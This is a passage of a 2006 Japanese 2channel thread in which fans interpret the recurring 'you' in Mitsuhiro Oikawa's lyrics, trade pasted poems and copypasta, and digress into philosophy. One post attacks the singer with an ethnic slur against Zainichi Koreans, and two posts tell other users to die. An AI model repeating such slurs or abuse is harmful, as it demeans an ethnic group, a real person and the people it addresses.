今宵の満月に乱された
哀れな少女に注ごうか

柩の中に眠る人形は薔薇に埋もれ
救いを真っ赤なロザリオに託し
硝子の涙を流す
後悔なのか
恐怖なのか
憎しみなのか…

罪人は私ではない
君の方だよ
君が私を狂わせるから…

仮面で包み隠した
野蛮で残酷な本性は
今宵の満月に乱された
哀れな少女に注ごうか


夢を断ち切られた少女
久遠の時空(とき)を…
美しいばかりに…
終わらぬ悲劇を

741 :NO MUSIC NO NAME:2006/09/16(土) 22:51:05 ID:SKv9RWtA
垂れ流しのポップス
パッチワークされた
昔の曲の使い回し
盗まれたかつての名曲
テレビやチャート、ましてやカラオケや着メロ
それが歌の全てなのか?
作られたヒット曲
金さえ積めば出来上がる歌姫
偽りの孤独
権力者の優しさ

逆らえという誘惑に
反抗期の少年は従う
声が枯れて歌えなくなっても

ニセモノは着飾っても贋物
フェイクスター気取ってる安いガラス玉
小さくても本物のダイヤモンド
自分の真実探して
ここがどこであっても歌い続ける
迫害されようと歌い続ける
電波に乗らない歌を

愛する貴方に荊の冠を
禁断の実から甘い酒を
長い髪に天使の嘆きを
脚元に悪魔の接吻を
アリアドネの糸は切れ
薔薇の迷宮に堕ちるだろう
貴方に溺れる快楽を
頬伝う血は邪神の誓約
刹那は星空に舞い
果てし無き永遠に続く
Oh I'm insane
sweet nightmare
腐敗した欲情が支配する
鎖繋がれた奴隷
背徳の吐息に崩れ落ち
耽美の夜に唯跪く…


742 :NO MUSIC NO NAME:2006/09/16(土) 22:53:11 ID:Kvq2a6EF
>>736
シンプル過ぎだクソヤロウ

全体的には綺麗にまとまってるが
「もううんざり」は相手にダメージは与えるけど、場がしらけるキーワードは自分の印象も悪い
2chの引き篭もり怨念罵りあいじゃねーんだ、
自分捨ててでも相手の足引っ張れば良いというのは、匿名コミュニティーの特殊な性質が作り上げた腐りきった幻のルール
醜い魑魅魍魎の法則、汚いんだよぉ・・不潔不潔不潔!

最低うっとぅしいとかうぜーだろ。虚無的過ぎる人間はモテねーよ!?ニーチェ気取りが
サルトルでも読みなぁ?

743 :NO MUSIC NO NAME:2006/09/16(土) 22:55:30 ID:o4NngUTs
>>742
だよね
昔表面上でしか所詮わからないけど
及川って詞とかに臭い言葉やストレートな表現確か嫌いだとか
雑誌のインタで言ってたと思うんだけど
最近その発言から見ると変化したなぁと思ったよ
なぜ及川がそこまで変わったのか
変わった理由・要因は詞に度々出てくる「君」の影響なのか?と思ったよ

昔の詞に対してどうでもいいような事を言っているけど
そんな事ないと思うんだよね
ビビカラのときどんな想いで書いたかコメントしているし
おそらく「君」が実在しているなら配慮して
昔の詞はどうでもいいとコメントしているのかと思った

744 :NO MUSIC NO NAME:2006/09/16(土) 22:56:17 ID:pQCVKnRi
普通に考えて、今失ってるんだから2年前がはじまりじゃね?
それに「君」が愛を教えてくれたんだから
昔から知ってたら今更って感じするけどな
そこまで深い想いって本質的なものじゃないと感じないと思う
君の名が心を潤してるのだってちょうど2年位前に
彼の心が枯れていたって所から来てるんだと思うし
ずっと昔から知ってるんなら名前がどうとかって感覚起きないと思うけどね
これも全部ガイシュツだけど

745 :NO MUSIC NO NAME:2006/09/16(土) 22:57:42 ID:YZMgPAwy
何とゆうか…
上でもある様に、精神的に彼にとって、君は大きかったんじゃないかと。
仲の良い双子なんかも、お互いをすごく求め合うってゆうか。
でも血の繋がりがある訳だから、結婚とかってゆうのは絶対に有り得ないから、やっぱり精神的繋がりかな?っと。
ループし過ぎた

746 :NO MUSIC NO NAME:2006/09/16(土) 22:58:22 ID:uQwXy4+a
恋愛としての感情じゃ無いにしても、
一度は切り捨てておいて、こっちとうまく行かないからって、「あぁ、やっぱりあっちにしておけば良かった」
なんて話は、お決まりの様に溢れてる。及川は、そんな気持ちで詩を書いてるんじゃないって信じたいけど
今まさに、そう解釈されても不思議じゃないトコまで来てるよね

747 :NO MUSIC NO NAME:2006/09/16(土) 22:59:32 ID:BR3i1jMp
言えてる。
なんか切羽詰ってるだろ及川

748 :NO MUSIC NO NAME:2006/09/16(土) 22:59:36 ID:6UtjCEBE
確かに、昔と言う程大昔じゃないけど、過去を懐かしむ歌詞はあったよね
でも、今の歌詞は懐かしむとゆうより…何だろう?
何て言ってソレを言い表して良いか分からない
ごめん←役立たず

でも、例えば君にしとけば〜
に近いモノがあったとして、でも恋愛対象じゃない
ってなると、君がもし彼に特別な感情を抱いていたとしたら、それはあまりにも酷過ぎる…
に、繋がらないかな?と思って
無理があり過ぎたかな

749 :NO MUSIC NO NAME:2006/09/16(土) 23:00:23 ID:BR3i1jMp
なんか知らんが。
及川光博恥じらいが出てきたか。
それとも見捨てたのか。

750 :NO MUSIC NO NAME:2006/09/16(土) 23:00:41 ID:oDVhBIKD
いや
整理して考えてみてくれ
2年前から発言で
そこから変化はあったものの
壮大になってきたのは叙情詞辺り、
そして彼の
取戻したいは
ここ最近発言。

彼の取戻したいはその前の事。

まぁ解釈だが長スマソ

751 :NO MUSIC NO NAME:2006/09/16(土) 23:01:18 ID:oDVhBIKD
雑誌に「恋愛は自分にとってはほんの少しの存在だから」って説明してたとおも
恋愛よりも大きいって意味で愛の存在・・つまり恋愛に勝ってるんだよ「君」は
占める割合が大きく恋愛より重要ってか?
「恋愛というより愛」とも言ってるから、
とりあえず「君」は、恋愛対象にも少し入ってくるってことでしょ?
性別は女性・・だよね。じゃ自分の子供に宛ててる歌では少なくとも無い。
「恋愛というより・・」なんて前フリしないもん、子供なら。
「ある人物がいて・・」て言ってるところをみると嫁への歌でもないよね、
「ある人物がいて」って、この発言で初めて挙げたって感じ。嫁だったらいまさら
「ある人物」とかそんな言い方して比喩するか?

752 :NO MUSIC NO NAME:2006/09/16(土) 23:02:01 ID:BR3i1jMp
トム大佐へのオマージュで灰は灰にが出てきたように。
自分で自分を批判したり別人として評価してるようには思えるフシはある。

753 :NO MUSIC NO NAME:2006/09/16(土) 23:02:14 ID:oDVhBIKD
でもきっと、君は無収入だよ。
だって、君が一緒に仕事をしていれば、どこかしらに同じ名前が出るだろうし、そろそろ顔や話題が本人達から出ても良いのに、
全くと言っていい程、君について及川は語らない。
そらすでしょ?
地球とか、自然とかって。
ベイベに対してなら、堂々とみんなに!って言えば良いのに…

754 :NO MUSIC NO NAME:2006/09/16(土) 23:03:48 ID:mMAsPaDB
詞でずっと訴えてるわりに
進展してないみたいってのは
つまり「口だけ番長」かな?
詞に昇華して満足しちゃってるなら
相手は思いを投げつけられてるんだか排泄されてるんだか
わかんないし。
信用に足らないってことになるかも。

それは芸術家のエゴみたいなところあると思う。
経験を随所に生かしてやろうって言う意地汚さが
ないといいものは生めないとも思う。
でも今のこのスレでの解釈状況を考えると
かなり情けないよミッチー…

755 :NO MUSIC NO NAME:2006/09/16(土) 23:04:55 ID:oDVhBIKD
好きになったものは全部歌詞に反映させてるという前提なのかい?
ていうか、歌詞はまず曲有りきの作曲者の意向尊重だからさ
世界観に惹かれる自分自身の世界観にはまる曲がなきゃ、
そういう歌詞は書けないと思うけど。
だいたいの曲はメロディーが綺麗だもんな〜。

756 :NO MUSIC NO NAME:2006/09/16(土) 23:05:30 ID:BR3i1jMp
恋愛という字を見てみろ。
恋人という字を見てみろ。
ヘタすりゃ。
変人なんだぞ。そこ注意きぼんぬ。

恋愛は愛ではない。
究極の愛は艱難苦。赤い血は力の素。
甘い愛は血の味。私の心は一杯。

757 :NO MUSIC NO NAME:2006/09/16(土) 23:07:13 ID:oDVhBIKD
自分的には「僕」は「君」の中の「記憶」(灯火)。だけど記憶は飛び交っているしかき消されそう。→皮膚感覚も鈍ってくる
君には忘れて欲しくないけど、僕は立ち尽くすばかりで何もできない。そうして君は記憶を喪失していく。何度もそうやって。
みたいな感じだと思ってた。これだけだと意味不明な連や言葉がでてくるけど・・・
ブラックアウト=一時的な記憶・意識の喪失らしいし

758 :NO MUSIC NO NAME:2006/09/16(土) 23:08:06 ID:oDVhBIKD
花梨の純情は影を残して紅い薫りをため息にした
蓮華畑で微笑む無邪気なキミがいとしくて・・・せつなくて
勝ち気な瞳に恋した 刹那の夢想愛をキミで潤してくれ
しゃきっとした横顔と甘え上手な真顔に魅せられた
がんばり屋なキミをジャケットごと抱き締めたい
生誕祭は誰かの腕の中で官能的に催されているのかも
新生の宇宙劇はもどかしく狂おしい世界革命
夕日に垣間見た螺旋の記憶は甘いDNAの落とし子
あおい奇蹟を見送って 愛の唄を声高らかに
絡めあう糸は地球の上で廻りつづけるメリーゴーランド

この詩を>>730に捧げる

759 :NO MUSIC NO NAME:2006/09/16(土) 23:10:08 ID:BR3i1jMp
だから個人的な感想だと。
曲が美しく感じるならそれでいいでしょ。
そういう極論として取られるのは残念だけどそんなんじゃなくて。
歌詞のために曲を利用しているとかそういった意味。
言葉の片鱗を曲で聴くのも良いものだなと思いました。

760 :NO MUSIC NO NAME:2006/09/16(土) 23:11:11 ID:26nJZYps
及川の歌詞作りなんか、全部めちゃめちゃ適当じゃん

あんなの、かっこいい言葉適当に集めてそれを音に乗せているだけだし

内容なんかありゃしない、深く考えて(・∀・)ィィ!!とか言うのおかしいだろ

かっこいいって反応ならまだ分かるがなw

共感しますって言ってる奴はホンとただの馬鹿だな

普通にそこら辺のアホガキだって共感する歌詞なんかみんな書いているし

そもそも及川自体、ダークな部分をクローズアップしている、だから特殊だ、と得意げ話しているが、

世の中のアーティストの殆どがそんな物(痛みなど)に主題を置いて書いている訳で

別に及川が斬新な所にスポットを当てていると言う事は全く無い、その事をを及川は分かっているのかと問いたい

まぁ所詮在日の焼肉屋の馬鹿息子だからなw

アルバムは糞、クズ、氏ね、FUCK YOU!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

761 :NO MUSIC NO NAME:2006/09/16(土) 23:12:38 ID:BR3i1jMp
>>758 そんなのイラネーよ。
もっとガッと来るもの。
他へ意識をそらすものをくれ。
今及川光博が浸透圧の関係でどんどん侵食してきてああ。

762 :NO MUSIC NO NAME:2006/09/16(土) 23:13:14 ID:Sj556zf0
とても小さく、かわいらしい人だった
駅の近くの街灯の下で
大きなバックを抱えて座っていたね

僕が駆け寄ると
ニッコリ笑って・・・

それから五日。
彼女との生活。

色々な事を話したね
もっともっと色んな事を話したかった

君は僕が眠っている間に
消えてしまった。
そして、もう二度と話すことが出来なくなった。

それからしばらくしてからの事でした
君がこの世に別れを告げて
旅だって行ったと。

始めからすべてわかっていたんだね
僕はもうしばらくコッチにいるね。

君が残したモノを
僕が出来る限り守っていく為に

763 :NO MUSIC NO NAME:2006/09/16(土) 23:14:13 ID:oDVhBIKD
お金になる文章を書いてるのがみえみえ。
でも最近はいいかも。
名前をIQすごくいいらしいとか言いふらして
売るところがミソ。

764 :NO MUSIC NO NAME:2006/09/16(土) 23:15:07 ID:BR3i1jMp
あんた私に言ってるわけじゃないだろうが。
共感しますってのは無いな。
ダークサイドがああそうかとは思っても。


765 :NO MUSIC NO NAME:2006/09/16(土) 23:16:27 ID:uVSQ67iK
「言葉を愛し始めたのはいつですか?」というベイベの質問に対し、
「言葉は愛していない、好きではない。」と言い切った。
「言葉が好きではないということが、詩を書く上で良かった。
常に言葉に疑問を持っている。言葉で真実は伝えられない。
詩の中に書かれている薔薇の方が
本当の薔薇よりすばらしいといったが、僕はそれに反発した。
すばらしい詩であろうが、本当の薔薇の方がよりすばらしいに決まっている。
言葉は真実、現実においつかないもの。
言葉に酔ったり、惚れ込んだりすることはない。
だから、かえって詩を客観的に見ることができた。
人間の意識下の、言葉にならないもののほうが、
はるかに人間を動かしているし、それが一番大事なもの。」だと答えた。

766 :NO MUSIC NO NAME:2006/09/16(土) 23:19:30 ID:BR3i1jMp
役者魂に欠けるな。及川。
本物の薔薇より造花の薔薇のほうが綺麗に見える。
だから虚構を演じる事が出来るんだと思うけど。

曲書くにしても何かを演じながら歌を歌うにしても。
偽というのはつねに美化され壊されていく。

767 :NO MUSIC NO NAME:2006/09/16(土) 23:19:32 ID:rftib8Nq
誰かが捨てた優しさを拾い集めたら幸せになれますか?
誰かが捨てたJOKERを誰かが引けば不幸になりますか?
Touch me! 儚げのキスを交わして 私を抱いて
Stand up!  夜のとばりから 朝焼けの中を・・
誰にもわからないホントの愛なんていらない
とめどなく溢れる寂しさをちょっとづつ埋めるだけ 
CRY FOR THE CRIMZON MOON

誰かがくれた情熱の夜に身をゆだねたら幸せになれますか?
誰かがくれた不純なモラルに巻かれたら不幸になりますか?
Take me! 夢見のキスを交わして 私を抱いて
Hold me! 永遠に忘れない一瞬になるように・・
満たされない想いに凍りついた夜を重ねれば
悲しさを刻むビートに誰もが踊りだす 
CRY FOR THE CRIMZON MOON

768 :NO MUSIC NO NAME:2006/09/16(土) 23:21:12 ID:oDVhBIKD
>>766
視点を持ってるものが主人公でいいんじゃない?
ダンデライオンだったらライオン。Kだったら黒猫。夢の飼い主なら夢。
誰の視点で物を見てるかだと思うが。
俺も車輪の主人公は「僕」だとオモ

769 :NO MUSIC NO NAME:2006/09/16(土) 23:22:32 ID:m+xEIwaH
>>768
自分の人生において「他人」からしたら自分は確かに他人だろう。
だが当たり前じゃない?自分だって他人を他人として扱ってるんだから。
それに、役を持った存在って方がおかしくない?役割なんて固定するものじゃないと思う。
RPGの町民じゃあるまいし

770 :NO MUSIC NO NAME:2006/09/16(土) 23:23:58 ID:BR3i1jMp
メッキをする方法を考えたのも日本人だ。
この日本に於いてメッキは大変画期的で皆が模倣できる
最短の時間を以って何かに変われるという事を身に着けた。
だが現実にそれをやるとパラノイアだとかナントカカントカ言われるし。
それでお金になるならヤッチマエみたいな。
そんな事も感じはする。

771 :NO MUSIC NO NAME:2006/09/16(土) 23:24:19 ID:Wg+brgja
人それぞれその曲を聞いて感じたことで良いんジャマイカ?

ミチーの曲って1人1人聞いた後の感じとか受け取り方が違うわけで。

しかもミチーは独特な歌詞が多いから聞いた人の人生、過ごし方、生活の環境によって受け取り方は絶対変わると思う。

ミチー自信も自分の歌詞を見たり聞いたりした人が同じ感じ方することを求めてるわけじゃないだろうし。

恋人同士の歌っぽいけど、友達に聞かせてどう思う?って聞いたら

子供がいたとしたらみたいな、「君」っていうのは子供だとしたらいいかもしれないみたいな事を言われた。

「君」を子供ってとらえ方をした人は初めてでそれはそれでいいなと思った。

うん、だからやっぱり人それぞれ曲の受け取り方は違うと思うから自分の考えを押しつけるみたいなレスはここではタブーだと思う

772 :NO MUSIC NO NAME:2006/09/16(土) 23:26:02 ID:BR3i1jMp
あんたらベイベも全員RPGの登場人物か。
あるいはムーヴィーロールにぐるぐる巻かれて同じことを何度も
何度も繰り返してジレンマ。
及川光博は外側から見ている。

773 :NO MUSIC NO NAME:2006/09/16(土) 23:26:31 ID:oDVhBIKD
この向こうに君がいる
どんな姿でいるのかは分からないが 僕を待っているはずだ
この向こうに君がいる
どんな都合があるのかは分からないが 僕を待っているはずだ
愚かな者が振り返り 弱さを笑い飛ばしたが 気にはするまい
何故なら僕は行かねばならないのだ
幼い頃 平和を願い続けた
今では 犯した罪だけが唸り続けている
数えられた善行の全ては過ぎ去った 全ての人々に残されたものは諦めなのか
この向こうにいる君に会いたくて 僕は這いつくばってでもそこへ行く
たとえもし君がいなくなってしまったとしても
だって この向こうに君がいる

この詩を>>770に捧げる

774 :NO MUSIC NO NAME:2006/09/16(土) 23:27:47 ID:MR2lyq+h
>>772
そもそもトートロジーにいろいろヴァリエーションがあるから、理性は厳密に
ならないんだよなあ。
権威の作用なきところに思考は成立しないです。

775 :NO MUSIC NO NAME:2006/09/16(土) 23:27:51 ID:BR3i1jMp
>>771 だな(・∀・)そうだ。
しかしな。私はそんな意味で言ったんじゃないぞこのやろう。
こう思ったみたいな。
純粋に感じたんだ。
あの人。

776 :NO MUSIC NO NAME:2006/09/16(土) 23:28:33 ID:T0hH3F1/
>>774
権威主義を盲目的に攻撃するのは、事大主義者の常套手段で、そのほうが
ずっと不吉で危険だと思う。

ナチのSSは、ヒットラー以外の古典主義的教養を持っていなかったし、
ベートーベンなどに敬意を払わなかったということを、映画などで私も
伝え聞いているけれど、「反権威主義」を基本姿勢とするということは、
それとほとんど同じなのではないだろうか。

777 :NO MUSIC NO NAME:2006/09/16(土) 23:29:17 ID:BR3i1jMp
>>773 だからイラネーってばw
枯渇した心を発奮させるような未発表plz

778 :NO MUSIC NO NAME:2006/09/16(土) 23:30:12 ID:coSzN++m
>>775
何の話してんのかまったく分からないんですが、この件ってお前の頭の中では
いったいどの件なんですか?

もういいからお前は寝ろよ。あるいは死ねよ。
わけわかんねーよ。

779 :NO MUSIC NO NAME:2006/09/16(土) 23:31:14 ID:oDVhBIKD
権威主義、権威、という言葉が、単純な、肉体的、心理的感覚の反射神経的
行動として、理解されている気がするな。
例えば、>>778の反応はあきらかに、肉体的、心理的感覚によるものの域を出ずに、
論理的な権威主義の次元までは行っていない。

造語であるから、権威主義的という理解は即座にしりぞけられるべきであり、そうなれば、
外国語はすべて権威的というものになってしまう。共有されていない新たな単語を目の前にして、
それは、共有されておらず、理解が不能である、と、そういうものを平気で使えるものは、単純な
コミニュケーション能力の欠如、であるということで片付けられるべきだろう。
逆を言えば、共有されている言葉には、+の意味での「権威」が付随していることになるわけだが、
権威というものが、単純な善悪に言論で、悪に還元するのは大馬鹿者のすることであり、権威主義
という言葉を持って、批判するもの自体がすでに「権威的」であるという事実を抜きにしては語りえない。
つまり、私はこう言いたい。権威、権威主義的、なんていう、まさに、権威、権威主義に付随した−の意味
合いと、無条件に受け入れられるべき「権威」に抑圧されている者であるという位置関係をもって、批判する
ものも権威的であり、権威主義に取り込まれている。

780 :NO MUSIC NO NAME:2006/09/16(土) 23:31:56 ID:BR3i1jMp
この件なんか0空気な言葉だ。
おまいこそ寝ろよ。
10lの毒電波

781 :NO MUSIC NO NAME:2006/09/16(土) 23:33:07 ID:BR3i1jMp
アレンジメントは用意済みだったのかw


782 :NO MUSIC NO NAME:2006/09/16(土) 23:33:23 ID:BwVzjRi1
>>775
曲が先に出来て、その雰囲気に合わせての作詞だと思います。
抑揚に合わせて、母音なども考えて組み合わせたり、
韻を踏んだりと、気を回すと多分、不自然な言い回しになるのでは?
と思いつつ、それぞれをクリアした上にメッセージを込めているので、
とても作詞に時間がかかっていると思われます。
頭が良いんですね。  気が付くのに時間がかかりました。

783 :NO MUSIC NO NAME:2006/09/16(土) 23:33:54 ID:BR3i1jMp
糞。あいつがいればな。
あいつがあすこに帰って来てくれさえすればいいのに。

784 :NO MUSIC NO NAME:2006/09/16(土) 23:34:39 ID:iayblhFd
明るくつっきってる曲でも、最後は燃え尽きたり、死んでしまったり、
来世や、その後の世界が幸せになればいいな〜っていう展開が多い。

なぜ「燃え尽き」てもいいのか、「死んでもいい」みたいな歌詞が多いのか考えたことがある。
ラルクでの最新作のLinkでもそうなんだよね。
すごく刹那的というか、退廃というか…
彼の夢が叶うのは、死語の世界か来世って自分で思ってるというか、
現世で叶うのははなから期待してないような印象うける。
(とかいったら嫁とか愛人とかの話になりそうで嫌だけど。
そういうことは、個人的には彼の中では一部でしかないと思う。)

785 :NO MUSIC NO NAME:2006/09/16(土) 23:38:36 ID:MMjeMCVi
私はこう解釈しました。
「君」と出てくると、
どうしても皆及川にとって特別な存在の「君」?って連想しがちだけど、
その固定観念を外してみれば終わらない未来
って、事だったんじゃないかな?ベイベのことをちゃんと考えてるなって
私は、捉えました。
「君」とは、及川が何に例えてるかって事で、「君」は例の「君」だって
思わなければ、なんて事のない話であると思う。
及川は自信家でありそうで、実はシャイな人だったら
もしかすると、自分の事を「君」と例えてるのかもしれないし。
全てベイベに向けて言ってる言葉に聞こえる。
突然で予想外の事に戸惑ってしまうかもしれないけど、ベイベのみんなはきっと信じて待ってくれているからって。
こんな感じでどうかな?


786 :NO MUSIC NO NAME:2006/09/16(土) 23:41:28 ID:cxSnPNah
夜はもうすぐ『明日』と交代するね

今、私だけが眠れない

今、私だけが起きている

スワロフスキービーズのブレスレットのようだ

787 :NO MUSIC NO NAME:2006/09/16(土) 23:43:05 ID:LyN1vsU4
自分も展望デッキ好き。
カラオケで歌ったら友達がいい曲書くんだね〜とミチーをほめてくれた。

788 :NO MUSIC NO NAME:2006/09/16(土) 23:44:49 ID:LyN1vsU4
あ、ごめん。本スレに書こうと思って間違えちゃった。
でもここ邦楽スレだからスレ違いではないよねw

なんかどれがコピペでどれがミチーについてのレスかわけがわからないね…

789 :NO MUSIC NO NAME:2006/09/16(土) 23:44:55 ID:cxSnPNah
>>787
やっぱりメンヘル擁護はオマエか!誤爆すんなよ氏ね

790 :NO MUSIC NO NAME:2006/09/16(土) 23:47:57 ID:7QxAVCFY
自分で死ねない私は殺されれば良いのよ
一人を追いつめ愛を裏切り憎しみで
殺されれば良いのよ
残された者も恨む対象を持ち
生きる糧となる
好きよ大好きよ精一杯愛するわ生ある限り
全部賭けて愛するわ
殺されるに値する
可愛い憎らしい女になって
時間と命をかけて
バキバキにあなたを壊すわ
だから愛して愛させて

ターゲットは無能の男
優しい寂しい愛されたがり屋

明日会えないの
どこに行くの
サビシイヨ

嫉妬深い目がセクシーで
切なすぎてイライラしちゃう

夜中に昼ドラごめんなさい
数年後小さなニュースになるわ
覚えておいて狡い女を 
かわいそうな一人の男を

791 :NO MUSIC NO NAME:2006/09/16(土) 23:53:47 ID:LyN1vsU4
>>789
ごめんなさい。もう逝きます。

792 :NO MUSIC NO NAME:2006/09/17(日) 00:20:39 ID:4hgH398G
逝くな>>791さnよ。
私も今日に限ってシャットダウンしてしまって今また。

というのは。純粋な溶液にするには詳しく注意深い観察と研究が
必要であるということと。
あるいはレシピ的な溶液で濁りが生じるものであるとしても。
及川光博が。
それを良く振ってから使用しないと効き目がないんだ。

793 :NO MUSIC NO NAME:2006/09/17(日) 00:22:39 ID:T+D8RPLl
>>792
「私はパンを焼いてあげました。
だからあなたも私にパンを焼いてください。
私は誕生日プレゼントをあげました。
だからあなたも私の誕生日にはプレゼントをください。
私はこれだけの事をしてあげました。
だからあなたも私に同じだけの事をしてください。
私はあなたを愛しています。だからあなたも私を愛してください。

ふざけんじゃないわよ!自分がどれだけのことをやってあげたからって、
相手にそれを求めるなんてただの我が侭もいいところじゃない!
好意ってのは誰かのためにしてあげることで、
そこに打算とか見返りとか、面倒なものは持ち込むなやっ!
そんなんじゃやることなすこと全部に他の目的があるみたいで、
この世の全てが胸糞悪くなるじゃないさっ!

好きなら好きでその気持ちを最後まで貫き通せばいいじゃないさ。
それが出来ないなら消えなさいよ。見苦しいだけよ。
私はこんなに頑張りました、だから私を褒めてくださいなんて・・・
ありもしない保証書握って借金取りみたいな惨めな姿これ以上さらすなやっ!!

好きって気持ちだけで相手を信じることができないなら、
もう終わってるんじゃないの?」

794 :NO MUSIC NO NAME:2006/09/17(日) 00:23:51 ID:4hgH398G
>>785 正に。
あの人の中には何人もの人がいてそれが色々とでてくるのかもな。
いや、多重人格保持者とかという曲がった見方をしないでくれ。
想像の域だと誰にも手が出せないから。
確実に守れるし。
my name is イゾベル。
結婚してる 自分と。みたいな。

795 :NO MUSIC NO NAME:2006/09/17(日) 00:25:14 ID:4hgH398G
>>793 すべてが欲しいわけじゃない。
でもすこしだけ少しだけ。
時々時々で良いから。
何かをシェアしたいと思う。

796 :NO MUSIC NO NAME:2006/09/17(日) 00:27:12 ID:6ipBuHI3
美しい花はある。
しかし花の美しさというものは無い。

花の美しさというものはなんでないんだい?

いろんな花に固有の美があって、「美しさ」というひとつの言葉だけに
集約しきれないからだよ。

797 :NO MUSIC NO NAME:2006/09/17(日) 00:28:36 ID:yz+na8qv
I hope I can make it across the border.
I hope to see my friend, and shake his hand.
I hope the Pacific is as blue as it has been in my dreams.
I hope.

798 :NO MUSIC NO NAME:2006/09/17(日) 00:30:23 ID:wiDwckyA
>>795に捧げる
Freude, schoner Gotterfunken
Tochter aus Elysium
Wir betreten feuertrunken,
Himmlische, dein Heiligtum!
Deine Zauber binden wieder,
was die Mode streng geteilt;
alle Menshen werden Bruder,
wo dein sanfter Flugel weilt.

799 :NO MUSIC NO NAME:2006/09/17(日) 00:31:52 ID:4NP0yHWV
>>795
自分の中にあるものを吐き出すような場合は、多少なりとも焦燥感などが
伴うと思います。元々、自分の中にある感情や出来事なだけに、却って
客観的視点を失いがちになるのでしょうね。
作品として設定したものの方が、抜かりが少ないと思います。
でも、安易な手法としてでなく、書く者としての視点を忘れずに「告白」すれば
それは想像上のものより真実味のある描写ができるとも、思います。
蛇足みたいなこと書いてしまって、すみません…。

800 :NO MUSIC NO NAME:2006/09/17(日) 00:32:49 ID:HF4gCKSw
今更何を――と思うかもしれないけど。私はきれい事が好きなの。馬鹿馬鹿しくても、青臭くても、そういうのが好き
なのよ。そしてそういうのを――自由とか平等とか、博愛とか……そういう事を大まじめに言える人々が好き。
それは私にはないものだから。
彼等を血で汚したくないの。青臭い理想でも、それを血で汚したくないの。だから、私は貴方達にそういう事全てを
背負わせた。その事については弁解しないわ。私を憎んでくれても構わない。
けれども貴方が誰か――誰でもいい。フォルシス王子でもいいし、ウイニアという子でもいい、ネイレディア様でもいい、
誰かそういう『汚れていない』人達を護りたい思うのなら、血にまみれなさい。殺しなさい。潰しなさい。汚れは自分が
全て引き受けなさい。あなたがそうして戦った分だけ、その人達を護る事ができるのよ。そして、その結果どれだけ
貴方が汚れようと――それは誇っていい汚れよ。私はそう思うの

801 :NO MUSIC NO NAME:2006/09/17(日) 00:36:36 ID:HF4gCKSw
>>800
ただ枷に反発しているだけで、己が独立して決めた決断でもないものを自由とは呼ばんように、
ただ他人と違うものを求めて、結局他人に左右されていることをオリジナリティとは呼ばんのだぞ。
自分が本当に持っているもの、自分が把握しているもの、自分が今まで積み重ねてきたもの、
それが本当のオリジナリティだ

802 :NO MUSIC NO NAME:2006/09/17(日) 00:51:39 ID:F6Bmb6ja
>>787
>なんかどれがコピペでどれがミチーについてのレスかわけがわからないね…
まったくだ。
BR3i1jMp・4hgH398G だけ拾って読んでるんだけどなw
>>798 は誰がどんな意図で貼ったんだか・・・
至極偶然なんだろうけど、その詞は、火星から来た者には殊更グッと来るんだよw
ハラショー! 兄弟よ。
久々に我等がアレックスに会いたくなってきた。(映画より小説のほうが好み。)


803 :NO MUSIC NO NAME:2006/09/17(日) 01:10:22 ID:HF4gCKSw
わかってないなあ。
凄い奴が凄いの書いても当たり前。
凄くない奴が凄くないの書いて、凄いと言われるから
それは凄いことなんだ。
詩ってみなそうよ。

804 :NO MUSIC NO NAME:2006/09/17(日) 01:40:38 ID:b/aWW+zb
>>802 ALEXなら、悲しみロケットのプロモドゾ〜 つ□ ←DVD


805 :NO MUSIC NO NAME:2006/09/17(日) 01:41:36 ID:b/aWW+zb
>>802 ALEXなら、悲しみロケットのプロモドゾ〜 つ□ ←DVD


806 :NO MUSIC NO NAME:2006/09/17(日) 01:41:52 ID:KPfisFV3


807 :NO MUSIC NO NAME:2006/09/17(日) 02:56:09 ID:4hgH398G
が。なんだ?

固有の美。正に及川光博が花なのか。

な?こんなふうにイマチュア及川な私を問いただし
自問自答や問いかけを行うことで何かを発見し
それをふまえて音楽を聴くという行為は
些か難物困難そして疑問が沸き起こるものではあるが
良いことの一つであったと思う

自負と偏見
それが自分の世界であったとしても
正しい事か間違っているかは玉虫色で見極めは困難を呈するが。
個人の世界観や価値観はゆるぎなくそこにある。

面白い。色々と。

808 :NO MUSIC NO NAME:2006/09/17(日) 03:03:10 ID:4hgH398G
及川光博が何を語ったか。
何を答えたかを私は知らない。

だがそれはいつもいつも浮遊し逍遥するものであって
固定的な言葉や観念であるとは言えないと思うがどうか?
全部を吐き出す人間とそうでない人間が居る。
例えそれが何かをパフォームし創る「仕事」の人だとしても
守りたい何かはきっとあるはずだ。

不特定多数のベイベ人間に対してもあの人は忠実であるかどうかは
誰も分らない。及川光博のものだ。

>>779さnの言葉は蛇足ではない。真実かもしれない。

809 :NO MUSIC NO NAME:2006/09/17(日) 03:04:45 ID:HF4gCKSw
>>807
固有の美をフェノロサが言う。
そのことによって「なるほどこういうものを固有の美というのか」と日本の美は「発見」される。
ちなみに美術書、美術史は江戸時代までたくさん存在しているわけではありませんが、
パラパラ見ていますと、申すまでもありませんが、禅とか仏教との関係で論じられているものが多い。
江戸時代後期になりますと、
西洋との比較の見方が出てきますが、
明治期、東アジアの中での共通する美が、日本固有の美にガラッと変わっていく。
これも近代と前近代の歴史を見る場合、押さえておかなければならない点だと思います。

過去の学問や世界観を無批判に受け入れることによって生じる偏見
自負は常に他人の感嘆によって強化される。

810 :NO MUSIC NO NAME:2006/09/17(日) 03:08:56 ID:KsNTrGi9
>>808
観念・・それは心像とどこが同じでどこが違うのか。
この問いに答えることは困難です。
というのも、この概念そのものが既に私たちにとって自明ではない上、
プラトンの「イデア」に端を発し、その後ロック、バークリー、デカルト、カントら様々な哲学者によって論じられる過程で、
かなり定義が変化してきたからです。そのため一口に「観念」と言っても、論者によってその意味が異なります。
ただ、一つだけ、
一般的に観念を心像から区別する重要な性質を挙げられます。
それは、観念は心像と違って必ずしも心の中に存在するとは限らない、ということです。
心と世界を媒介する第三の集合、それが観念の集合です。
あるいは、心像の集合を真部分集合として含む、思考対象全体の集合である、と言うこともできます。
実際、心像の集合と観念の集合とでは、
後者の方が濃度が大きくなります(両者が無限集合だった場合は別ですが)。
なぜなら、観念の集合には例えば神、意志、匂いなど、
私たちが心像を持つことのできない対象の観念が含まれるからです。
その逆に、観念として存在しえない対象の心像、というものは存在しません。
だから、心像の集合は観念の集合の真部分集合と位置付けられます。

811 :NO MUSIC NO NAME:2006/09/17(日) 03:13:08 ID:4hgH398G
固有の美を持つ日本に於いて
美しさをどれだけ表現するかは
日本に育った私たちのコモンセンスにゆだねられる。

「老婆の休日」のサワリの部分があんなに下らないのに。
文珍さんが語るとどうしてああ面白く聞こえるかとか。

歪んだもの美しいもの強く心をひきつけられるもの。
ああ
